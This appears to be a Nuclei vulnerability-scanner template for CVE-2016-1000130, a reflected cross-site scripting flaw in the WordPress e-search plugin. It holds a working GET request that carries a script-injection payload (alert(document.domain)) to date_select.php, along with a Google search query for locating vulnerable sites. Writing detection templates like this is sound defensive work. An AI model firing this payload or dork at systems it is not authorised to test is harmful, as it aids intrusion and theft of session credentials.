nuclei-templates/cves/2016/CVE-2016-1000130.yaml

43 lines
1.4 KiB
YAML
Raw Normal View History

2021-07-16 17:52:56 +00:00
id: CVE-2016-1000130
info:
name: WordPress e-search <=1.0 - Cross-Site Scripting
2021-07-16 17:52:56 +00:00
author: daffainfo
severity: medium
description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wordpress.org/plugins/e-search
- http://www.vapidlabs.com/wp/wp_advisory.php?v=394
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000130
cwe-id: CWE-79
2022-07-11 17:25:45 +00:00
metadata:
google-query: inurl:"/wp-content/plugins/e-search"
tags: cve,cve2016,wordpress,xss,wp-plugin
2021-07-16 17:52:56 +00:00
requests:
- method: GET
path:
2021-07-19 05:42:07 +00:00
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-16 17:52:56 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-19 05:42:07 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-16 17:52:56 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/12